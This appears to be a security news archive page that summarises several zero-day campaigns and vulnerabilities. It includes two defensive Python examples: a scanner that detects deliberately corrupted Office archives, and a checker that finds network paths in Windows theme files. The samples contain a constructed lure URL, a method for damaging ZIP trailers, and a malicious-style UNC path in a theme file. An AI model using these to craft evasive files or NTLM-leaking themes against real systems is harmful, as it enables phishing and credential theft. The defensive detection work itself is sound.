zero-day attack

Tech Optimizer
February 21, 2025
Security researchers have identified a zero-day vulnerability in PostgreSQL, tracked as CVE-2025-1094, which is believed to have played a part in the breach of the US Treasury in December. The breach was initially attributed to CVE-2024-12356, a command injection vulnerability in the BeyondTrust Remote Support platform, but successful exploitation of CVE-2024-12356 required prior exploitation of CVE-2025-1094. Although BeyondTrust issued a patch for CVE-2024-12356 in December 2024, the underlying PostgreSQL flaw remained unfixed, leaving CVE-2025-1094 a zero-day until it was reported to PostgreSQL. Chinese hackers reportedly gained remote access to multiple Treasury workstations, potentially exposing unclassified documents; which documents were accessed and how many workstations were involved have not been disclosed. The incident fits a broader pattern of intrusions attributed to Chinese state-sponsored actors.
AppWizard
December 5, 2024
A sophisticated exploit kit named MOONSHINE targets Android messaging applications to implant backdoors on users' devices. The group behind the attacks, Earth Minotaur, focuses on the Tibetan and Uyghur communities: it distributes crafted messages over instant messaging platforms that lure victims into clicking malicious links, which redirect them to servers hosting the MOONSHINE exploit kit and lead to the installation of a cross-platform backdoor called DarkNimbus. The upgraded MOONSHINE kit uses pre-configured attack links, browser version checks, multiple Chromium exploits and a phishing-for-downgrade technique, and can target the in-app browsers of various Android applications, including WeChat, Facebook, Line and QQ. DarkNimbus exists in Android and Windows versions, with features for gathering device information, extracting personal data and enabling surveillance. MOONSHINE has also been linked to other Chinese operations, including POISON CARP and UNC5221, indicating a shared tooling ecosystem among Chinese threat actors. Users are advised to treat unsolicited links with caution and to keep applications updated.
Tech Optimizer
December 5, 2024
Researchers at ANY.RUN have identified a zero-day attack campaign, active since at least August 2024, that uses deliberately corrupted files to bypass security controls. The files, typically disguised as ZIP archives or DOCX documents, are damaged in a way that defeats the parsers in antivirus engines, sandboxes and email spam filters, while the target applications repair and open them through their built-in recovery mechanisms. Because conventional antivirus engines cannot scan them, static analysis tools fail to process them, and email filters let them through, the malicious content is delivered once the recovered file is opened, despite its damaged appearance. ANY.RUN's interactive sandbox analyzes such files dynamically, observing the recovery and the malicious behaviour that follows it. The chain is: a corrupted file is delivered by email; security tools fail to parse it and therefore fail to detect it; the application's recovery mechanism opens it; and the malicious behaviour only becomes visible at runtime. The campaign underlines the need for detection that does not silently skip what it cannot parse.
Tech Optimizer
December 3, 2024
Security researchers at Any.Run have discovered a zero-day attack that bypasses the detection tools security professionals rely on. It uses deliberately corrupted files that evade antivirus software, fail to upload to sandboxes and slip past Outlook's spam filters. The files arrive by email disguised as messages from payroll or human resources. When opened, they trigger a file recovery prompt in software such as Microsoft Word; the recovered document then directs users to credential-stealing sites. The method combines social engineering with malformed files and poses a significant threat to organizations that rely on detection tools alone.
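The two Any.Run items above describe one failure mode: a scanner that cannot parse a damaged archive gives up, while Word or an archiver repairs the file and opens it. The following is an added example, not code from ANY.RUN or from either article. It builds a minimal DOCX-style ZIP, strips the central directory and end-of-central-directory record so that Python's zipfile module rejects the file, and contrasts a naive scanner that reports it as "unscannable" with a triage routine that treats the parse failure as a signal and walks the surviving local file headers to recover and inspect the content. The document body, the URL in it, the reserved .invalid domain and the verdict strings are constructed for the example; the salvage step is a simplification of what a repair routine does and does not handle entries that use data descriptors.

```python
import io
import re
import struct
import zipfile
import zlib

# Constructed sample body for a DOCX-style document (not real malware): a payroll lure
# carrying a link to a fictional credential-harvesting page on a reserved .invalid domain.
SAMPLE_BODY = (b"<w:document><w:body><w:t>Payroll update, sign in at "
               b"https://payroll-portal.invalid/login</w:t></w:body></w:document>")

URL_RE = re.compile(rb"https?://[^\s<>\"']+")
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")   # ZIP local file header (30 bytes)


def build_docx_like(body: bytes) -> bytes:
    """Build a minimal, valid DOCX-style ZIP container around the sample body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", b"<Types/>")
        zf.writestr("word/document.xml", body)
    return buf.getvalue()


def corrupt_trailer(data: bytes) -> bytes:
    """Damage the archive the way the campaign's files were damaged: drop the central
    directory and the end-of-central-directory (EOCD) record. Every local file header
    and compressed payload survives, which is what an application's repair routine needs."""
    eocd = data.rfind(b"PK\x05\x06")
    cd_offset = struct.unpack_from("<I", data, eocd + 16)[0]   # offset of central directory
    return data[:cd_offset]


def naive_verdict(data: bytes) -> str:
    """The failure mode described in the articles: a scanner that treats an unparseable
    archive as out of scope and lets it through."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)):
            return "scanned"
    except zipfile.BadZipFile:
        return "unscannable"


def salvage_entries(data: bytes) -> dict:
    """Recover entries without a central directory by walking local file headers, a
    simplified version of what a repair routine does. Entries whose sizes live in a
    trailing data descriptor (general-purpose flag bit 3) are not handled here."""
    entries = {}
    pos = data.find(b"PK\x03\x04")
    while pos != -1 and pos + LOCAL_HDR.size <= len(data):
        (_sig, _ver, flags, method, _time, _date, _crc,
         csize, _usize, name_len, extra_len) = LOCAL_HDR.unpack_from(data, pos)
        if flags & 0x08:
            break
        name_start = pos + LOCAL_HDR.size
        name = data[name_start:name_start + name_len].decode("utf-8", "replace")
        body_start = name_start + name_len + extra_len
        body = data[body_start:body_start + csize]
        if method == 8:                       # DEFLATE, stored as a raw stream
            try:
                entries[name] = zlib.decompress(body, -15)
            except zlib.error:
                entries[name] = b""
        elif method == 0:                     # stored, no compression
            entries[name] = body
        else:
            entries[name] = b""
        pos = data.find(b"PK\x03\x04", body_start + csize)
    return entries


def triage(data: bytes) -> dict:
    """Hardened path: a parse failure is itself a signal, and whatever can be recovered
    is still inspected (here: for URLs) instead of being waved through."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            payloads = {name: zf.read(name) for name in zf.namelist()}
        verdict = "parsed"
    except zipfile.BadZipFile:
        payloads = salvage_entries(data)
        office_parts = any(name.startswith("word/") for name in payloads)
        verdict = "suspicious-recoverable-office" if office_parts else "corrupt"
    urls = sorted({u.decode("utf-8", "replace")
                   for p in payloads.values() for u in URL_RE.findall(p)})
    return {"verdict": verdict, "names": sorted(payloads), "urls": urls}


if __name__ == "__main__":
    intact = build_docx_like(SAMPLE_BODY)
    broken = corrupt_trailer(intact)
    print("naive:", naive_verdict(broken))
    print("triage:", triage(broken))
```

The verdict is the point for a mail gateway: a damaged Office document that still yields `word/` parts should be quarantined or detonated in a sandbox, not passed through because the parser gave up on it.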
Winsage
October 30, 2024
A newly identified zero-day vulnerability in Windows Themes files allows attackers to capture NTLM credentials simply by having a malicious theme file viewed in Windows Explorer. Reported by ACROS Security, it affects fully updated Windows systems, including Windows 11 24H2, and requires no user interaction beyond the file being displayed. Microsoft had addressed a related issue as CVE-2024-21320 and, after that fix was bypassed, a follow-up issue as CVE-2024-38030; ACROS found that the second patch was still incomplete and could likewise be bypassed. ACROS has released a temporary micropatch via its 0patch service that blocks the leak by correctly detecting network paths in theme files. A leaked NTLM authentication can be relayed to other services or cracked offline, and the issue affects Windows versions from Windows 7 to Windows 11 24H2. A demonstration showed that copying a malicious theme file to an unpatched PC triggers a network connection that sends NTLM credentials to the attacker, while the micropatch blocks this connection.
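The micropatch's job, as described above, is to recognise a network path in a theme file before Windows tries to resolve it. The following is an added example, not ACROS's 0patch code and not from the article: the equivalent check written as a gateway- or endpoint-side scanner in Python. It parses a constructed `.theme` file (INI syntax) and flags every value that resolves to a network location, accepting the spellings a narrow check might miss (`\\server\share`, `//server/share`, `\\?\UNC\server\share` and `scheme://` URLs). The sample theme, its key names as used here, and the 203.0.113.7 test address are constructed for the example.

```python
import configparser
import re

# Constructed sample .theme file (not a real malicious theme): BrandImage points at a UNC
# share on a reserved test address. The other entries are ordinary local paths.
SAMPLE_THEME = r"""; constructed sample for the scanner below
[Theme]
DisplayName=Quarterly Report Theme
BrandImage=\\203.0.113.7\share\brand.png

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\Web\Wallpaper\Windows\img0.jpg
Pattern=

[MasterThemeSelector]
MTSM=DABJDKT
"""

# scheme://host style references (http://, file://, ...). At least two characters
# before the colon so that a drive letter such as C:\ never matches.
SCHEME_RE = re.compile(r"^[A-Za-z][\w+.-]+:[\\/]{2}")


def _normalize(value: str) -> str:
    """Strip quotes and whitespace and fold forward slashes, which Windows accepts as
    path separators, into backslashes so one check covers both spellings."""
    return value.strip().strip('"').replace("/", "\\")


def is_network_path(value: str) -> bool:
    r"""True if the value would make Windows reach out over the network when resolved:
    \\server\share, //server/share, \\?\UNC\server\share or a scheme:// URL."""
    v = _normalize(value)
    if v.startswith("\\\\"):
        return True
    return SCHEME_RE.match(v) is not None


def scan_theme(text: str) -> list:
    """Parse a .theme file and return (section, key, value) for every value that
    resolves to a network location. Every key is checked rather than a fixed list,
    so a path tucked into an unexpected key is still reported."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str            # keep the original key case for reporting
    cp.read_string(text)
    return [(section, key, value)
            for section in cp.sections()
            for key, value in cp.items(section)
            if is_network_path(value)]


if __name__ == "__main__":
    for hit in scan_theme(SAMPLE_THEME):
        print("network path in theme:", hit)
```

A scan like this complements the patch rather than replacing it: Windows resolves the path as soon as Explorer renders the file, so blocking such files at the mail gateway, or restricting outbound NTLM with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, are the controls that stop the leak on a system that is not yet patched.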
Winsage
October 16, 2024
ScarCruft, a North Korean cyber group, exploited a zero-day vulnerability in Windows, tracked as CVE-2024-38178 (CVSS 7.5), a memory corruption issue in the Scripting Engine. The flaw allows remote code execution when a user opens a malicious URL in the Edge browser running in Internet Explorer mode. Microsoft patched it in August 2024. The attack, dubbed "Operation Code on Toast," involved compromising a South Korean advertising agency's server and injecting exploit code into toast advertisements, the pop-up ad notifications common in South Korea. The exploit triggers a type confusion error in Internet Explorer's JavaScript engine, letting the attackers infect PCs running a toast program that still relies on the vulnerable IE component. The malware delivered, RokRAT, has advanced capabilities and uses legitimate cloud services for command and control. ScarCruft has a history of exploiting legacy browser vulnerabilities and has previously targeted other flaws in the Scripting Engine. Users are advised to keep their systems updated to reduce the risk.
Winsage
July 17, 2024
The ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112, which allowed attackers to open files and websites through the disabled Internet Explorer process by abusing MSHTML. The vulnerability was used in a spear-phishing campaign by the operators behind Void Banshee, targeting victims in North America, Europe and Southeast Asia. The campaign distributed malicious files disguised as PDFs through cloud-sharing sites, Discord servers and online libraries. The payload, the Atlantida stealer, harvests sensitive information from a range of applications and collects system information and geolocation data. The exploitation tactic resembles that of an earlier MSHTML vulnerability, CVE-2021-40444; both have since been patched by Microsoft. Unsupported Windows components such as Internet Explorer remain an overlooked attack surface that threat actors can still reach, and organizations should keep their software updated to close it.